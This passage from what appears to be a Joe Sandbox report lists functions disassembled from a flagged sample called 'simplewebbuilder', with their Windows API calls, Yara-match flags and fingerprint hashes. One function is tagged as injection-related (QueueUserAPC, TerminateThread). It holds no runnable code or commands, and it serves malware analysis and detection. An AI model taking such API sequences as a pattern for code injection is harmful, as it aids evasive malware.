                                                                                                                            • Opcode Fuzzy Hash: 04978173c4f2aad6ddf0a9b2dd67cf14b182e4245fdcd9156cda6d464bb7ec48
                                                                                                                            • Instruction Fuzzy Hash: 54318372600618AEDB20A660CE4AF9B776CEB45344F5004BFF945B61C1EAB8AA448F5D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00404DB4 Relevance: 12.1, APIs: 8, Instructions: 132COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00403196), ref: 00404DCF
                                                                                                                            • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00403196), ref: 00404DE3
                                                                                                                            • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00403196), ref: 00404E0F
                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00403196), ref: 00404E47
                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00403196), ref: 00404E69
                                                                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,?,?,00403196), ref: 00404E82
                                                                                                                            • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00403196), ref: 00404E95
                                                                                                                            • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00404ED3
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3332985584.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000011.00000002.3332985584.000000000040B000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_400000_simplewebbuilder.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: EnvironmentStrings$ByteCharFreeMultiWide
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1823725401-0
                                                                                                                            • Opcode ID: 5df378f2b83ba4a7a4bd83ea2c47c7d8eb90fe3c70b4f87b1639606013dd4eda
                                                                                                                            • Instruction ID: 56fc3daba095db5e8e6f62c072fe8221d0ae9ee3e10054882f672288d86757d0
                                                                                                                            • Opcode Fuzzy Hash: 5df378f2b83ba4a7a4bd83ea2c47c7d8eb90fe3c70b4f87b1639606013dd4eda
                                                                                                                            • Instruction Fuzzy Hash: 8E31CDF25042555EDB206BA4DD8483BB69CFB85358716093BF782E3280EA798C5186E9
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 009C1C10 Relevance: 10.6, APIs: 7, Instructions: 132COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • OpenEventA.KERNEL32(00100002,00000000,00000000,C05FB8F7), ref: 009C1CB0
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 009C1CC5
                                                                                                                            • ResetEvent.KERNEL32(00000000,C05FB8F7), ref: 009C1CCF
                                                                                                                            • CloseHandle.KERNEL32(00000000,C05FB8F7), ref: 009C1D04
                                                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,C05FB8F7), ref: 009C1D7A
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 009C1D8F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseEventHandle$CreateOpenReset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1285874450-0
                                                                                                                            • Opcode ID: 5c9769baffbb380568d801ceb0d0319b2c138ea1a072ecfef8aceb2619d36e1d
                                                                                                                            • Instruction ID: 692e82c5f5dd6220b3630fd24f6cf324f4f5b24f585ca844338893bd56005523
                                                                                                                            • Opcode Fuzzy Hash: 5c9769baffbb380568d801ceb0d0319b2c138ea1a072ecfef8aceb2619d36e1d
                                                                                                                            • Instruction Fuzzy Hash: D8412E70D45358ABDF10CFA5CC44FAEBBB8AB06720F10461DE819AB282D7749D05CB95
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 009B2081 Relevance: 10.6, APIs: 7, Instructions: 116timeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 009B20AC
                                                                                                                            • SetWaitableTimer.KERNEL32(00000000,?,00000001,00000000,00000000,00000000), ref: 009B20CD
                                                                                                                            • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 009B20D8
                                                                                                                            • InterlockedDecrement.KERNEL32(?), ref: 009B213E
                                                                                                                            • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000001F4,?), ref: 009B217A
                                                                                                                            • InterlockedDecrement.KERNEL32(?), ref: 009B2187
                                                                                                                            • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 009B21A6
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Interlocked$Exchange$Decrement$CompletionQueuedStatusTimerWaitable
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1171374749-0
                                                                                                                            • Opcode ID: 948d4c220ba56ea83ee8a639dfe9361b48bfa270c33f9db0e4b121e7c95de9de
                                                                                                                            • Instruction ID: dbce809210248cb2b664351d1143f622c28060cf6277ff61eb2c4ede4f23bea2
                                                                                                                            • Opcode Fuzzy Hash: 948d4c220ba56ea83ee8a639dfe9361b48bfa270c33f9db0e4b121e7c95de9de
                                                                                                                            • Instruction Fuzzy Hash: 13414A71508701AFC311DF25C988AABBBF9FFC8760F004A1EF49692251DB30E949CB62
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 009C1D22 Relevance: 10.6, APIs: 7, Instructions: 107synchronizationCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 009C24D0: OpenEventA.KERNEL32(00100002,00000000,?,?,?,009C1D2E,?,?), ref: 009C24FF
                                                                                                                              • Part of subcall function 009C24D0: CloseHandle.KERNEL32(00000000,?,?,009C1D2E,?,?), ref: 009C2514
                                                                                                                              • Part of subcall function 009C24D0: SetEvent.KERNEL32(00000000,009C1D2E,?,?), ref: 009C2527
                                                                                                                            • OpenEventA.KERNEL32(00100002,00000000,00000000,C05FB8F7), ref: 009C1CB0
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 009C1CC5
                                                                                                                            • ResetEvent.KERNEL32(00000000,C05FB8F7), ref: 009C1CCF
                                                                                                                            • CloseHandle.KERNEL32(00000000,C05FB8F7), ref: 009C1D04
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 009C1D35
                                                                                                                              • Part of subcall function 009C4B5A: RaiseException.KERNEL32(?,?,009C0155,?,?,?,?,?,?,?,009C0155,?,009E1F98,?), ref: 009C4BAF
                                                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,C05FB8F7), ref: 009C1D7A
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 009C1D8F
                                                                                                                              • Part of subcall function 009C2210: GetCurrentProcessId.KERNEL32(?), ref: 009C2269
                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,C05FB8F7), ref: 009C1D9F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Event$CloseHandle$Open$CreateCurrentExceptionException@8ObjectProcessRaiseResetSingleThrowWait
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2227236058-0
                                                                                                                            • Opcode ID: 853c5f73117beb1e5857591d76f5e1abd1d8933fd539fb669acedce75b7f12bd
                                                                                                                            • Instruction ID: c47bf3d8194ed2891f4605aa432f56d31ea3c404433c939f7549fe49e47e3ad5
                                                                                                                            • Opcode Fuzzy Hash: 853c5f73117beb1e5857591d76f5e1abd1d8933fd539fb669acedce75b7f12bd
                                                                                                                            • Instruction Fuzzy Hash: 98313971E44308ABEF20DBA4CC45FADB7B8AF46720F14411DF819EB282DB209D458B66
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 009C6394 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __init_pointers.LIBCMT ref: 009C6394
                                                                                                                              • Part of subcall function 009C8B02: RtlEncodePointer.NTDLL(00000000), ref: 009C8B05
                                                                                                                              • Part of subcall function 009C8B02: __initp_misc_winsig.LIBCMT ref: 009C8B20
                                                                                                                              • Part of subcall function 009C8B02: GetModuleHandleW.KERNEL32(kernel32.dll,?,009E2598,00000008,00000003,009E1F7C,?,00000001), ref: 009C9881
                                                                                                                              • Part of subcall function 009C8B02: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 009C9895
                                                                                                                              • Part of subcall function 009C8B02: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 009C98A8
                                                                                                                              • Part of subcall function 009C8B02: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 009C98BB
                                                                                                                              • Part of subcall function 009C8B02: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 009C98CE
                                                                                                                              • Part of subcall function 009C8B02: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 009C98E1
                                                                                                                              • Part of subcall function 009C8B02: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 009C98F4
                                                                                                                              • Part of subcall function 009C8B02: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 009C9907
                                                                                                                              • Part of subcall function 009C8B02: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 009C991A
                                                                                                                              • Part of subcall function 009C8B02: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 009C992D
                                                                                                                              • Part of subcall function 009C8B02: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 009C9940
                                                                                                                              • Part of subcall function 009C8B02: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 009C9953
                                                                                                                              • Part of subcall function 009C8B02: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 009C9966
                                                                                                                              • Part of subcall function 009C8B02: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 009C9979
                                                                                                                              • Part of subcall function 009C8B02: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 009C998C
                                                                                                                              • Part of subcall function 009C8B02: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 009C999F
                                                                                                                            • __mtinitlocks.LIBCMT ref: 009C6399
                                                                                                                            • __mtterm.LIBCMT ref: 009C63A2
                                                                                                                              • Part of subcall function 009C640A: RtlDeleteCriticalSection.NTDLL(00000000), ref: 009C8F38
                                                                                                                              • Part of subcall function 009C640A: _free.LIBCMT ref: 009C8F3F
                                                                                                                              • Part of subcall function 009C640A: RtlDeleteCriticalSection.NTDLL(009E4978), ref: 009C8F61
                                                                                                                            • __calloc_crt.LIBCMT ref: 009C63C7
                                                                                                                            • __initptd.LIBCMT ref: 009C63E9
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 009C63F0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3567560977-0
                                                                                                                            • Opcode ID: ce53f3648ebdcc035d7d75cb8041f7071dbd826047d42e930ef33b059dde8a74
                                                                                                                            • Instruction ID: 72ae807468aced1b7c2492436b24170d8fd750a47581bbb05d917f21bc3cb661
                                                                                                                            • Opcode Fuzzy Hash: ce53f3648ebdcc035d7d75cb8041f7071dbd826047d42e930ef33b059dde8a74
                                                                                                                            • Instruction Fuzzy Hash: A9F06232D2D7715AE6287B757C4AF5A37889B81774B20461EF460D50E2FF1188425156
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 009C3AC1 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,?,009C3A73,00000000), ref: 009C3ADB
                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 009C3AE2
                                                                                                                            • RtlEncodePointer.NTDLL(00000000), ref: 009C3AEE
                                                                                                                            • RtlDecodePointer.NTDLL(00000001), ref: 009C3B0B
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                                                            • String ID: RoInitialize$combase.dll
                                                                                                                            • API String ID: 3489934621-340411864
                                                                                                                            • Opcode ID: 07bc1ea63976c0a0b92e00e903a9cdbaea054898834b758d15e93f6c3dc1609d
                                                                                                                            • Instruction ID: e88e60aaa9f0b84f31d6c888d745a376c05d59aba863293b6eb091edfbb00abd
                                                                                                                            • Opcode Fuzzy Hash: 07bc1ea63976c0a0b92e00e903a9cdbaea054898834b758d15e93f6c3dc1609d
                                                                                                                            • Instruction Fuzzy Hash: 24E06DB05FC381AEDB206FB0EC4AF433754A740706F008025B545D41E0CBB08888AB11
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 009C3B96 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,009C3AB0), ref: 009C3BB0
                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 009C3BB7
                                                                                                                            • RtlEncodePointer.NTDLL(00000000), ref: 009C3BC2
                                                                                                                            • RtlDecodePointer.NTDLL(009C3AB0), ref: 009C3BDD
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                                                            • String ID: RoUninitialize$combase.dll
                                                                                                                            • API String ID: 3489934621-2819208100
                                                                                                                            • Opcode ID: e4f294e6ce8ea0ebc0ec2f6b59221b0d60f42af2acf62b15fecfabc4af77d7ea
                                                                                                                            • Instruction ID: b53fc20934515e5caa3882f559fb07afdc7b274a08c6a3de1fffe792ab396e55
                                                                                                                            • Opcode Fuzzy Hash: e4f294e6ce8ea0ebc0ec2f6b59221b0d60f42af2acf62b15fecfabc4af77d7ea
                                                                                                                            • Instruction Fuzzy Hash: C5E01AB05ED300EFDB102FE0BC4EF123764B700746F008466B240A46A0CB704A45EA11
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 009C2530 Relevance: 10.2, APIs: 8, Instructions: 154memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • TlsGetValue.KERNEL32(00000026,C05FB8F7,?,?,?,?,00000000,009D70B8,000000FF,009C27CA), ref: 009C256A
                                                                                                                            • TlsSetValue.KERNEL32(00000026,009C27CA,?,?,00000000), ref: 009C25D7
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009C2601
                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 009C2604
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: HeapValue$FreeProcess
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1812714009-0
                                                                                                                            • Opcode ID: 1af42585b12ff746f2541bc59d9cf615307ee92e4939ca499f1c65033c77d5d4
                                                                                                                            • Instruction ID: 7d35e72e3acfee6db876ab2bec8a619e2b5080421bee49ce92317b68dfe11fa4
                                                                                                                            • Opcode Fuzzy Hash: 1af42585b12ff746f2541bc59d9cf615307ee92e4939ca499f1c65033c77d5d4
                                                                                                                            • Instruction Fuzzy Hash: 2451C0719043449FD720DF29C944F16BBE8FB89764F05855EF85897291DB30EC00CBA2
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 009D5C80 Relevance: 9.3, APIs: 6, Instructions: 276COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _ValidateScopeTableHandlers.LIBCMT ref: 009D5D90
                                                                                                                            • __FindPESection.LIBCMT ref: 009D5DAA
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: FindHandlersScopeSectionTableValidate
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 876702719-0
                                                                                                                            • Opcode ID: fb3152e5f30700ee4ddfc738babe8b8a694d8d70970856648d8e3fc8174182e7
                                                                                                                            • Instruction ID: 1047f52ef0f46a48520ec19d84865fcf5766ce6f1bb5095d3db09703742765ef
                                                                                                                            • Opcode Fuzzy Hash: fb3152e5f30700ee4ddfc738babe8b8a694d8d70970856648d8e3fc8174182e7
                                                                                                                            • Instruction Fuzzy Hash: 4CA1B471A50B559FCB10CF68D9807ADB7A9FB44710F1AC52AE809EB391E731ED01CBA0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 009B1C91 Relevance: 9.0, APIs: 6, Instructions: 39synchronizationthreadinjectionCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 009B1CB1
                                                                                                                            • CloseHandle.KERNEL32(?), ref: 009B1CBA
                                                                                                                            • InterlockedExchangeAdd.KERNEL32(009E8284,00000000), ref: 009B1CC6
                                                                                                                            • TerminateThread.KERNEL32(?,00000000), ref: 009B1CD4
                                                                                                                            • QueueUserAPC.KERNEL32(009B1E7C,?,00000000), ref: 009B1CE1
                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 009B1CEC
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Wait$CloseExchangeHandleInterlockedMultipleObjectObjectsQueueSingleTerminateThreadUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1946104331-0
                                                                                                                            • Opcode ID: 57192d71fa53276640a5b14c82bbac32727c03e19ed1af56f5c622a235600bb5
                                                                                                                            • Instruction ID: 11f2a0e7eee4ed225d8885f5272cf718f00d4d4fa9036102a9874fc828504183
                                                                                                                            • Opcode Fuzzy Hash: 57192d71fa53276640a5b14c82bbac32727c03e19ed1af56f5c622a235600bb5
                                                                                                                            • Instruction Fuzzy Hash: 62F0AF31195604BFCB204F96DD0DCDBBFBCEB85720700421EF56A921A1DF70A844DB20
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00403302 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 115COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetVersionExA.KERNEL32 ref: 00403321
                                                                                                                            • GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 00403356
                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 004033B6
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3332985584.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000011.00000002.3332985584.000000000040B000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_400000_simplewebbuilder.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: EnvironmentFileModuleNameVariableVersion
                                                                                                                            • String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
                                                                                                                            • API String ID: 1385375860-4131005785
                                                                                                                            • Opcode ID: 20ba641d7c2c240a4f2581cb70a1084239a766f54bb07c670b5bceb4295ae64b
                                                                                                                            • Instruction ID: 4b08c86a7d9428a74474774e457b3a663dfcff145a9399c9a999905afefb3de6
                                                                                                                            • Opcode Fuzzy Hash: 20ba641d7c2c240a4f2581cb70a1084239a766f54bb07c670b5bceb4295ae64b
                                                                                                                            • Instruction Fuzzy Hash: 5331287190129869EB328B705C856DA3F6C9B02709F2404FFD544FA2C2DA789F868B19
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 009C1F30 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 66COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • std::exception::exception.LIBCMT ref: 009C1F7F
                                                                                                                              • Part of subcall function 009C2AD3: std::exception::_Copy_str.LIBCMT ref: 009C2AEC
                                                                                                                              • Part of subcall function 009C1350: __CxxThrowException@8.LIBCMT ref: 009C13AE
                                                                                                                            • std::exception::exception.LIBCMT ref: 009C1FDE
                                                                                                                            Strings
                                                                                                                            • boost unique_lock has no mutex, xrefs: 009C1F6E
                                                                                                                            • $, xrefs: 009C1FE3
                                                                                                                            • boost unique_lock owns already the mutex, xrefs: 009C1FCD
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: std::exception::exception$Copy_strException@8Throwstd::exception::_
                                                                                                                            • String ID: $$boost unique_lock has no mutex$boost unique_lock owns already the mutex
                                                                                                                            • API String ID: 2140441600-46888669
                                                                                                                            • Opcode ID: 5f829ad7903671adbff06b8c8cc9094aae7d235ea2952f7aaab4e181403eaa95
                                                                                                                            • Instruction ID: 412e20a9ddcc863a0570d0efaaffaaccd91e58df75c74ca69ad40549b83089ef
                                                                                                                            • Opcode Fuzzy Hash: 5f829ad7903671adbff06b8c8cc9094aae7d235ea2952f7aaab4e181403eaa95
                                                                                                                            • Instruction Fuzzy Hash: 4921E8718083849FD720DF24C445B5BBBE4BB89708F54491EF5A587381D7B9D808CB97
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 009C507F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __getptd_noexit.LIBCMT ref: 009C5083
                                                                                                                              • Part of subcall function 009C6272: GetLastError.KERNEL32(75920A60,7591F550,009C6460,009C3633,7591F550,?,009B6181,00000104,75920A60,7591F550,00434B50,?,?,?,?,009B6B02), ref: 009C6274
                                                                                                                              • Part of subcall function 009C6272: __calloc_crt.LIBCMT ref: 009C6295
                                                                                                                              • Part of subcall function 009C6272: __initptd.LIBCMT ref: 009C62B7
                                                                                                                              • Part of subcall function 009C6272: GetCurrentThreadId.KERNEL32 ref: 009C62BE
                                                                                                                              • Part of subcall function 009C6272: SetLastError.KERNEL32(00000000,009B6181,00000104,75920A60,7591F550,00434B50,?,?,?,?,009B6B02), ref: 009C62D6
                                                                                                                            • __calloc_crt.LIBCMT ref: 009C50A6
                                                                                                                            • __get_sys_err_msg.LIBCMT ref: 009C50C4
                                                                                                                            • __invoke_watson.LIBCMT ref: 009C50E1
                                                                                                                            Strings
                                                                                                                            • Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 009C508E, 009C50B4
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast__calloc_crt$CurrentThread__get_sys_err_msg__getptd_noexit__initptd__invoke_watson
                                                                                                                            • String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
                                                                                                                            • API String ID: 109275364-798102604
                                                                                                                            • Opcode ID: 417e4bae19f5958c97ff963176c050424cd9f71f6699062fc000e380c57a4b7c
                                                                                                                            • Instruction ID: 2b87bf3b4c08348d47b585dbafe685dbaacfaa12337f00aed67f69e32c26b018
                                                                                                                            • Opcode Fuzzy Hash: 417e4bae19f5958c97ff963176c050424cd9f71f6699062fc000e380c57a4b7c
                                                                                                                            • Instruction Fuzzy Hash: 23F0BB31D45F1457EB31B5155C41F6B729CDB817A0B12042EFE4CD6241DA21AC8042D7
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 009B2341 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 009B2350
                                                                                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 009B2360
                                                                                                                            • PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 009B2370
                                                                                                                            • GetLastError.KERNEL32 ref: 009B237A
                                                                                                                              • Part of subcall function 009B1712: __EH_prolog.LIBCMT ref: 009B1717
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ExchangeInterlocked$CompletionErrorH_prologLastPostQueuedStatus
                                                                                                                            • String ID: pqcs
                                                                                                                            • API String ID: 1619523792-2559862021
                                                                                                                            • Opcode ID: 636d4755937d6ddabb6f879d45bed91f5840d893e0c0fbb91bf89230da00010b
                                                                                                                            • Instruction ID: 944b865a2e5b3f74e0110a96292207d214baa40eb0fbf6259e9493a946f82534
                                                                                                                            • Opcode Fuzzy Hash: 636d4755937d6ddabb6f879d45bed91f5840d893e0c0fbb91bf89230da00010b
                                                                                                                            • Instruction Fuzzy Hash: 18F0BE30945304AFDB20AFB4DD09FEB7BECEB40701B00892AF906C3101EB70D8489791
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 009B4030 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 26memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __EH_prolog.LIBCMT ref: 009B4035
